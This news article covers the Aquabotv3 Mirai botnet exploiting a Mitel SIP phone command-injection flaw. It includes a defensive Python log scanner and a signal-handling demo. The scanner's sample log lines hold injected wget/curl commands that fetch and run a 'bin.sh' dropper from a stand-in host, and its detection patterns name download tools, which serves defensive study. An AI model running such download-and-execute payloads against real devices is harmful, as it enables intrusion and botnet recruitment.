Cyber Security News

New Aquabot Malware Actively Exploiting Mitel SIP Phone Command Injection Vulnerability

Akamai’s Security Intelligence and Response Team (SIRT) has uncovered a novel variant of the Mirai-based botnet malware, dubbed Aquabotv3, actively targeting Mitel SIP phones via a critical vulnerability.

This marks the third observed iteration of Aquabot, which now showcases unique capabilities not previously seen in Mirai derivatives.

The malware exploits CVE-2024-41710, a command injection vulnerability disclosed in mid-2024, to gain unauthorized root access on affected devices.

Aquabotv3 introduces an unorthodox feature: a “report_kill” mechanism that notifies its command-and-control (C2) servers when the bot process on an infected device receives a termination signal such as SIGTERM. Note that SIGKILL cannot be caught or handled by a user-space process on Linux, so a handler of this kind can only report catchable signals; a `kill -9` still ends the process unreported.

[Figure: Reporting to the C2 that it caught a kill signal]

While this addition could enhance botnet monitoring or resilience, its true purpose remains speculative.

Aquabotv3’s activity underscores an evolving strategy by threat actors to refine malware for improved operational effectiveness.

Malware Propagation

The exploited vulnerability, CVE-2024-41710, affects Mitel’s 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit, with firmware versions up to R6.4.0.HF1.

The flaw arises from insufficient sanitization of parameters submitted to the phone’s web interface, allowing attackers to inject malicious payloads via crafted HTTP POST requests.

A publicly available proof-of-concept (PoC) by researcher Kyle Burns in mid-2024 demonstrated how an attacker could manipulate device configurations during the boot process to execute arbitrary code.

In early January 2025, Akamai’s global honeypot network detected active exploitation attempts closely resembling the PoC payload.

The malware leverages this vulnerability to download and execute “bin.sh,” a dropper script that retrieves Aquabot binaries compiled for multiple architectures, including x86, ARM, and MIPS, so that the same stage works across the different CPUs found in IoT devices.
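To make the propagation chain concrete, and to give the IOC monitoring recommended at the end of this article something to act on, here is an added example (not code from Akamai or from this article) that scans web-server-style request logs for the two things the text describes: shell metacharacters injected into a POST form parameter, and a download-and-execute stage that fetches a dropper script. The log format, endpoint paths, IP addresses and payload strings are all constructed for the example; they are not the published PoC for CVE-2024-41710 and not Akamai’s indicators.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log lines: source IP, method, path, URL-encoded form body.
# Endpoint names, addresses and payloads are illustrative only.
SAMPLE_LOG = """\
203.0.113.10 POST /login.html "username=admin&password=admin"
198.51.100.7 POST /config.html "param=1%3Bwget+http%3A%2F%2F192.0.2.5%2Fbin.sh+-O+%2Ftmp%2Fb.sh%3Bsh+%2Ftmp%2Fb.sh"
203.0.113.10 POST /config.html "timezone=UTC&server=sip.example.org"
198.51.100.9 POST /config.html "param=%24(curl+-s+http%3A%2F%2F192.0.2.5%2Fbin.sh%7Csh)"
203.0.113.10 GET /index.html ""
"""

LINE_RE = re.compile(r'^(?P<src>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<body>.*)"$')

# Shell metacharacters that have no business inside a phone configuration value.
META_RE = re.compile(r'[;|`]|\$\(|&&')
# Commands a Mirai-style dropper stage typically issues to fetch and run a script.
DROPPER_RE = re.compile(r'\b(?:wget|curl|tftp|chmod|busybox)\b|\.sh\b|/tmp/')
# URLs embedded in a payload are candidate IOCs (payload-hosting servers).
URL_RE = re.compile(r"https?://[^\s;|'\"]+")


def scan(log_text):
    """Return (findings, iocs) for POST requests whose form values look like
    command injection or a download-and-execute stage.

    findings: list of dicts with the source IP, path, parameter and reasons.
    iocs:     sorted list of URLs found inside flagged values.
    """
    findings, iocs = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # parse_qs splits on '&' and URL-decodes each value, so %3B becomes ';'
        # only after the split: an encoded separator cannot hide a second value.
        for param, values in parse_qs(m["body"], keep_blank_values=True).items():
            for value in values:
                reasons = []
                if META_RE.search(value):
                    reasons.append("shell metacharacter")
                if DROPPER_RE.search(value):
                    reasons.append("download-and-execute pattern")
                if reasons:
                    findings.append({"src": m["src"], "path": m["path"],
                                     "param": param, "reasons": reasons})
                    iocs.update(URL_RE.findall(value))
    return findings, sorted(iocs)


if __name__ == "__main__":
    found, urls = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['src']} -> {f['path']} param={f['param']}: {', '.join(f['reasons'])}")
    print("candidate IOC URLs:", urls)
```

Run it against real logs by feeding the file contents to `scan()` in place of `SAMPLE_LOG`; the URLs it extracts are the payload-hosting addresses to block at the firewall, and the source IPs are the scanners to watch for across the rest of the estate.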

Advanced Features and Target Expansion

Aquabotv3 retains the DDoS attack capabilities of earlier versions while adding detection-evasion techniques.

For instance, it renames its process to blend in with legitimate ones and installs signal handlers so that catchable termination signals are reported to the C2 rather than silently ending the bot. This does not stop an uncatchable SIGKILL, so the handling is about visibility for the operators, not immunity.
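The following is an added example, not Aquabotv3’s code, written to show what the “report_kill” handling described above (and in the introduction) can and cannot intercept. It registers a reporting handler for several signals, records which registrations the kernel accepts, delivers SIGTERM to the process to show the report firing, and restores the previous handlers. The `report_kill:` message format and the list of signals are assumptions for illustration; the C2 transmission is replaced by appending to a list.

```python
import errno
import os
import signal


def make_reporter(sink):
    """Stand-in for the bot's C2 notification: record instead of transmitting.

    The message format is hypothetical; the real wire format is not
    described on this page.
    """
    def report(signame):
        sink.append(f"report_kill:{signame}")
    return report


def install_kill_reporters(report, names=("SIGTERM", "SIGHUP", "SIGKILL", "SIGSTOP")):
    """Try to register a reporting handler for each named signal.

    Returns a dict mapping the signal name to True when a handler was
    installed, or to a short reason when the kernel refuses. SIGKILL and
    SIGSTOP cannot be caught, blocked or ignored, so sigaction() rejects
    them with EINVAL: a "report on kill" feature only ever sees catchable
    signals.
    """
    outcome = {}
    for name in names:
        signum = getattr(signal, name)

        def handler(_signum, _frame, name=name):
            report(name)

        try:
            signal.signal(signum, handler)
            outcome[name] = True
        except OSError as exc:
            outcome[name] = f"uncatchable ({errno.errorcode.get(exc.errno, exc.errno)})"
    return outcome


def demo():
    """Install the handlers, deliver SIGTERM to ourselves, restore old handlers."""
    sink = []
    previous = {n: signal.getsignal(getattr(signal, n)) for n in ("SIGTERM", "SIGHUP")}
    try:
        outcome = install_kill_reporters(make_reporter(sink))
        os.kill(os.getpid(), signal.SIGTERM)  # caught: the reporter runs
        # Python runs signal handlers at the next bytecode check; a short
        # bounded loop guarantees one happens before we look at the result.
        for _ in range(10_000):
            if sink:
                break
    finally:
        for name, old in previous.items():
            if old is not None:
                signal.signal(getattr(signal, name), old)
    return outcome, sink


if __name__ == "__main__":
    results, reports = demo()
    for name, result in results.items():
        print(f"{name:8} -> {result}")
    print("reports sent:", reports)
```

The practical consequence for responders: a `kill -9` of the bot process produces no C2 report, while a plain `kill` does, so if you are cleaning a device and do not want to tip off the operators, use SIGKILL (or pull the network first) before rebooting it into patched firmware.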

It also establishes communication with multiple C2 infrastructure endpoints, ensuring robust connectivity.

Additionally, the malware attempts to exploit other weaknesses, including exposed Hadoop YARN ResourceManager APIs and CVE-2018-17532, an unauthenticated command injection in Teltonika RUT9XX routers, alongside other IoT device flaws, to broaden its footprint.

Observed payloads indicate a focus on distributing Mirai variants across various vulnerable systems.

Unusual for Mirai derivatives, Aquabotv3’s signal-handling and C2 reporting functions may let the operators learn when and where their bots are being terminated, or serve as groundwork for stealth improvements in future iterations.

However, that continuous communication with C2 servers is also a network-visible beacon that can expose infected devices, giving defenders a detection point for mitigation.

[Figure: Advertisement on one of the botnet’s domains]

Aquabotv3 reaffirms the persistent threat posed by Mirai-based malware to IoT ecosystems, particularly devices with weak security configurations.

Its emergence highlights the pressing need for organizations to prioritize firmware updates, strengthen input sanitization, and replace legacy systems.

Simple measures, such as changing default credentials on IoT devices, can significantly reduce exposure to such attacks.

As DDoS attacks remain a lucrative cybercriminal strategy, Akamai warns that botnets like Aquabot are increasingly marketed as “DDoS-as-a-Service” on underground platforms, including Telegram.

Security teams are encouraged to monitor for the published indicators of compromise (IOCs), such as C2 and payload-hosting addresses, and to deploy proactive defenses such as anomaly detection and firewall rules that block those hosts.

Akamai assures continued surveillance of this threat and regularly updates its research to inform the cybersecurity community.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
